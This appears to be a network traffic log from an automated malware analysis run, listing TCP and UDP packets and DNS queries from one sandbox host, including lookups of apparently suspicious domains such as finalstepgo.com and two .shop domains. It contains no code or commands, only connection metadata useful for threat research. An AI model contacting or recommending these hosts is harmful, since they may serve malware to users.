Sep 26, 2024 17:55:47.111623049 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.111955881 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.112021923 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.112695932 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.112762928 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.112976074 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.113043070 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.113046885 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.113063097 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.113116980 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.113550901 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.113596916 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.113612890 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.113617897 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.113656998 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.114202023 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.114245892 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.114276886 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.114281893 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.114300013 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.114321947 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.126825094 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.126912117 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.153639078 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.153724909 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.172365904 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.172446966 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.172585964 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.172660112 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.197926044 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.198009968 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.198132038 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.198226929 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.198452950 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.198517084 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.198779106 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.198815107 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.198834896 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.198847055 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.198865891 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.198888063 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.199621916 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.199683905 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.199837923 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.199907064 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.199975967 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.200038910 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.200184107 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.200253010 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.200443983 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.200527906 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.200716972 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.200751066 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.200782061 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.200787067 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.200810909 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.200836897 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.213551044 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.213640928 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.240526915 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.240590096 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.240633965 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.240658045 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.240770102 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.240792036 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.240804911 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:47.240809917 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:47.341228008 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:47.415015936 CEST	443	49825	13.107.213.254	192.168.2.16
Sep 26, 2024 17:55:47.415086985 CEST	49825	443	192.168.2.16	13.107.213.254
Sep 26, 2024 17:55:50.941236019 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:54.173229933 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:54.173233032 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:54.173397064 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:55.402374029 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:56.201266050 CEST	49683	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:56.669636965 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:56.669692039 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:56.669804096 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:56.675487041 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:56.675522089 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.151195049 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.151422977 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.153114080 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.153136015 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.153403997 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.208268881 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.411541939 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.411541939 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.411706924 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.520134926 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.520194054 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.520237923 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.520263910 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.523606062 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.523701906 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.523711920 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.523724079 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.523823023 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.524640083 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.524657011 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:57.524673939 CEST	49829	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:57.524679899 CEST	443	49829	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.107013941 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.107069016 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.107151031 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.107615948 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.107637882 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.577459097 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.577606916 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.579425097 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.579437971 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.579710960 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.581226110 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.581516027 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:58.581542969 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:58.773264885 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:59.006278992 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:59.006380081 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:59.006453991 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:59.006647110 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:59.006647110 CEST	49830	443	192.168.2.16	172.67.206.221
Sep 26, 2024 17:55:59.006665945 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:55:59.006676912 CEST	443	49830	172.67.206.221	192.168.2.16
Sep 26, 2024 17:56:00.118766069 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:00.118823051 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:00.118953943 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:00.119141102 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:00.119158030 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:00.972407103 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:00.973025084 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:00.973084927 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:00.973794937 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:00.973802090 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:00.973823071 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:00.973835945 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.329675913 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.329698086 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.329740047 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.329799891 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:01.329813004 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.329865932 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:01.330157042 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:01.330182076 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.330194950 CEST	49831	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:56:01.330200911 CEST	443	49831	40.126.32.68	192.168.2.16
Sep 26, 2024 17:56:01.519005060 CEST	443	49824	23.1.33.206	192.168.2.16
Sep 26, 2024 17:56:01.519076109 CEST	49824	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:56:07.743313074 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:07.743362904 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:07.743582010 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:07.744003057 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:07.744019032 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.148655891 CEST	49697	80	192.168.2.16	93.184.221.240
Sep 26, 2024 17:56:08.148741961 CEST	49698	80	192.168.2.16	93.184.221.240
Sep 26, 2024 17:56:08.153978109 CEST	80	49697	93.184.221.240	192.168.2.16
Sep 26, 2024 17:56:08.154045105 CEST	49697	80	192.168.2.16	93.184.221.240
Sep 26, 2024 17:56:08.154289007 CEST	80	49698	93.184.221.240	192.168.2.16
Sep 26, 2024 17:56:08.154337883 CEST	49698	80	192.168.2.16	93.184.221.240
Sep 26, 2024 17:56:08.548019886 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.548129082 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.549927950 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.549957037 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.550435066 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.551843882 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.595447063 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.971697092 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.971759081 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.971802950 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.971956968 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.971956968 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.972007990 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.972069025 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.972848892 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.972902060 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.972930908 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.972978115 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.973010063 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.973131895 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.973191977 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.978650093 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.978691101 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:08.978717089 CEST	49834	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:56:08.978733063 CEST	443	49834	52.165.165.26	192.168.2.16
Sep 26, 2024 17:56:25.560329914 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:25.560400963 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:25.560517073 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:25.560811996 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:25.560842037 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:26.243220091 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:26.243733883 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:26.243752003 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:26.244206905 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:26.244782925 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:26.244862080 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:26.292351961 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:36.152652025 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:36.152756929 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:36.152862072 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:36.900928020 CEST	49836	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:56:36.900979996 CEST	443	49836	172.217.16.132	192.168.2.16
Sep 26, 2024 17:56:51.347613096 CEST	59822	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:56:51.352615118 CEST	53	59822	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:51.352724075 CEST	59822	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:56:51.352724075 CEST	59822	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:56:51.358705044 CEST	53	59822	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:51.852972984 CEST	53	59822	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:51.854399920 CEST	59822	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:56:51.860008001 CEST	53	59822	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:51.860086918 CEST	59822	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:56:58.260477066 CEST	49700	80	192.168.2.16	192.229.221.95
Sep 26, 2024 17:56:58.273441076 CEST	80	49700	192.229.221.95	192.168.2.16
Sep 26, 2024 17:56:58.273598909 CEST	49700	80	192.168.2.16	192.229.221.95
Sep 26, 2024 17:57:25.619501114 CEST	59824	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:57:25.619549036 CEST	443	59824	172.217.16.132	192.168.2.16
Sep 26, 2024 17:57:25.619628906 CEST	59824	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:57:25.619930029 CEST	59824	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:57:25.619942904 CEST	443	59824	172.217.16.132	192.168.2.16
Sep 26, 2024 17:57:26.582243919 CEST	443	59824	172.217.16.132	192.168.2.16
Sep 26, 2024 17:57:26.582720995 CEST	59824	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:57:26.582775116 CEST	443	59824	172.217.16.132	192.168.2.16
Sep 26, 2024 17:57:26.583949089 CEST	443	59824	172.217.16.132	192.168.2.16
Sep 26, 2024 17:57:26.584265947 CEST	59824	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:57:26.584455967 CEST	443	59824	172.217.16.132	192.168.2.16
Sep 26, 2024 17:57:26.633429050 CEST	59824	443	192.168.2.16	172.217.16.132

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 17:55:20.651766062 CEST	53	58943	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:20.685570002 CEST	53	64634	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:21.601667881 CEST	49770	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:21.601754904 CEST	65241	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:21.608933926 CEST	53	49770	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:21.609457016 CEST	53	65241	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:21.611593962 CEST	58302	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:21.611824989 CEST	53816	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:21.618886948 CEST	53	53816	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:21.618925095 CEST	53	58302	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:21.692922115 CEST	53	51320	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:22.600230932 CEST	64943	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:22.600378990 CEST	53549	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:22.607296944 CEST	53	64943	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:22.608437061 CEST	53	53549	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:24.651992083 CEST	53195	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:24.652335882 CEST	52860	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:24.659718037 CEST	53	52860	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:24.660310030 CEST	53	53195	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:25.142277002 CEST	56451	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:25.142461061 CEST	56065	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:25.149383068 CEST	53	56065	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:25.149827003 CEST	53	56451	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:26.084290981 CEST	53987	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:26.084351063 CEST	57735	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:26.090184927 CEST	53371	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:26.090755939 CEST	51917	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:26.091483116 CEST	53	53987	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:26.092715979 CEST	53	57735	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:26.096173048 CEST	53	60336	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:26.096992970 CEST	53	53371	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:26.097938061 CEST	53	51917	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:26.163980007 CEST	53	58067	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:27.080962896 CEST	61556	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:27.081113100 CEST	51776	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:27.088143110 CEST	53	51776	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:27.088371992 CEST	53	61556	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:27.160861015 CEST	53	57463	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:27.458169937 CEST	61065	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:27.458517075 CEST	57380	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:27.466183901 CEST	53	57380	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:27.466245890 CEST	53	61065	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:28.079600096 CEST	53	63975	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:28.137137890 CEST	59875	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:28.137255907 CEST	57271	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:28.143939972 CEST	53	57271	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:28.144754887 CEST	53	59875	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:28.144896030 CEST	53	57308	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:29.066309929 CEST	53	59362	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:29.070079088 CEST	53	53111	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:38.736203909 CEST	53	57673	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:41.834773064 CEST	62010	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:41.851546049 CEST	53	62010	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:56.592067957 CEST	53667	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:56.636248112 CEST	53	53667	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:56.640050888 CEST	53987	53	192.168.2.16	1.1.1.1
Sep 26, 2024 17:55:56.658983946 CEST	53	53987	1.1.1.1	192.168.2.16
Sep 26, 2024 17:55:57.760026932 CEST	53	54838	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:20.635516882 CEST	53	54938	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:20.809556961 CEST	53	51083	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:28.168560982 CEST	138	138	192.168.2.16	192.168.2.255
Sep 26, 2024 17:56:48.252562046 CEST	53	58905	1.1.1.1	192.168.2.16
Sep 26, 2024 17:56:51.347023010 CEST	53	49884	1.1.1.1	192.168.2.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 17:55:21.601667881 CEST	192.168.2.16	1.1.1.1	0x1b82	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:21.601754904 CEST	192.168.2.16	1.1.1.1	0x13f5	Standard query (0)	google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:21.611593962 CEST	192.168.2.16	1.1.1.1	0x7666	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:21.611824989 CEST	192.168.2.16	1.1.1.1	0x492	Standard query (0)	google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:22.600230932 CEST	192.168.2.16	1.1.1.1	0x2162	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:22.600378990 CEST	192.168.2.16	1.1.1.1	0x3025	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:24.651992083 CEST	192.168.2.16	1.1.1.1	0xb8aa	Standard query (0)	csp.withgoogle.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:24.652335882 CEST	192.168.2.16	1.1.1.1	0xcd49	Standard query (0)	csp.withgoogle.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:25.142277002 CEST	192.168.2.16	1.1.1.1	0xd9fb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:25.142461061 CEST	192.168.2.16	1.1.1.1	0x2c04	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:26.084290981 CEST	192.168.2.16	1.1.1.1	0xcde9	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:26.084351063 CEST	192.168.2.16	1.1.1.1	0x6376	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:26.090184927 CEST	192.168.2.16	1.1.1.1	0x1a6f	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:26.090755939 CEST	192.168.2.16	1.1.1.1	0x92c1	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:27.080962896 CEST	192.168.2.16	1.1.1.1	0xd90d	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:27.081113100 CEST	192.168.2.16	1.1.1.1	0xdf5c	Standard query (0)	play.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:27.458169937 CEST	192.168.2.16	1.1.1.1	0x4990	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:27.458517075 CEST	192.168.2.16	1.1.1.1	0x277b	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:28.137137890 CEST	192.168.2.16	1.1.1.1	0xccb2	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:28.137255907 CEST	192.168.2.16	1.1.1.1	0x1e1e	Standard query (0)	play.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:55:41.834773064 CEST	192.168.2.16	1.1.1.1	0x14b2	Standard query (0)	finalstepgo.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:56.592067957 CEST	192.168.2.16	1.1.1.1	0xa7f8	Standard query (0)	candleduseiwo.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:56.640050888 CEST	192.168.2.16	1.1.1.1	0x1671	Standard query (0)	racedsuitreow.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 17:55:21.608933926 CEST	1.1.1.1	192.168.2.16	0x1b82	No error (0)	google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
